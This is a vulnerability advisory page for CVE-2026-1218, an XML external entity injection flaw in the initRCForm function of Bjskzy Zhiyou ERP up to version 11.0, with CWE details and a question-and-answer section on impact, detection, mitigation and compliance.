CVE-2026-1218
XML External Entity Injection in Bjskzy Zhiyou ERP Remote Exploit
Publication date: 2026-01-20
Last updated on: 2026-04-29
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| beijing_shikong_zhiyou_technology_co_ltd | bjskzy_zhiyou_erp | to 11.0 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-611 | The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output. |
| CWE-610 | The product uses an externally controlled name or reference that resolves to a resource that is outside of the intended control sphere. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-1218 is an XML External Entity (XXE) injection vulnerability in Bjskzy Zhiyou ERP up to version 11.0. It affects the function initRCForm in the RichClientService.class file. The vulnerability allows an attacker to manipulate XML parsing to reference external entities, which can cause the system to embed unauthorized external documents into its output. This flaw can be exploited remotely without requiring physical or local access, and a proof-of-concept exploit is publicly available. [1, 2]
How can this vulnerability impact me? :
This vulnerability can impact you by compromising the confidentiality, integrity, and availability of the affected system. An attacker exploiting this XXE flaw can gain unauthorized access to sensitive data, cause denial of service, or potentially execute remote code depending on the payload and system configuration. The attack is remotely executable and considered easy to perform, which increases the risk of exploitation. [1, 2]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection of this vulnerability involves monitoring for XML External Entity (XXE) injection attempts targeting the initRCForm function of the RichClientService component. Since the exploit is public and targets XML processing, network detection can include inspecting XML payloads for external entity references. Specific commands are not provided in the resources, but general approaches include using network intrusion detection systems (NIDS) with signatures for XXE attacks, or analyzing application logs for suspicious XML input. Additionally, scanning the Bjskzy Zhiyou ERP version 11.0 installations for the vulnerable component can help identify exposure. [1, 2]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include replacing the affected Bjskzy Zhiyou ERP product with an alternative solution, as no vendor patches or countermeasures have been provided. Users should review their ERP deployments and consider disabling or restricting access to the vulnerable initRCForm function if possible. Monitoring for exploit attempts and limiting network exposure of the ERP system can also reduce risk. Applying general XML parser hardening to disable external entity processing may help if configurable. Since a proof-of-concept exploit is public, urgent action is recommended. [1, 2]
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability allows unauthorized data access and system compromise through XML External Entity injection, impacting confidentiality, integrity, and availability of the system. Since Bjskzy ERP is used in regulated industries such as pharmaceuticals and supply chain, this vulnerability could lead to non-compliance with industry regulations like Good Supply Practice (GSP) standards. Although GDPR or HIPAA are not explicitly mentioned, the potential for data disclosure and system compromise implies risks to compliance with data protection regulations that require safeguarding sensitive information. [2]